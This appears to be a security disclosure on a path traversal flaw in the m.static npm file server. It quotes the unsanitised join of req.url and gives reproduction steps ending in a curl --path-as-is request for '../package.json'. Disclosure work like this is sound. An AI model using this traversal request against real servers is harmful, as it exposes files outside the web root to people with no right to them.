m.static
describes itself as: m(icro)static is a lightweight static file server for node.js written in es6+.
Observation:
- Virtually zero downloads, so no considerable impact.
- It was last published 4 years ago.
Resources:
- Project's GitHub source code: https://github.com/ivoputzer/m.static/
- Project's npm package: https://www.npmjs.com/package/m.static
This file server library is vulnerable to Path Traversal attacks because no input sanitization or other checks and protections are applied to the requested path (line 19 of index.js):
    const requestFile = join(options.cwd, req.url)
This vulnerability should probably be classified as CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal').
- Install the latest version of m.static (npm install --save m.static@2.2.0)
- Make sure you have a public/ directory with files in it
- Run the server: npx m.static --port 3000 --cwd public/
- Send a request for a file outside the static directory and confirm that it succeeds, i.e. that the path traversal attack works:
    curl --path-as-is "http://localhost:3000/../package.json"
  and observe the contents of the file returned in the response.
├── public
│   └── index.html
├── server.js
└── package.json
Liran Tal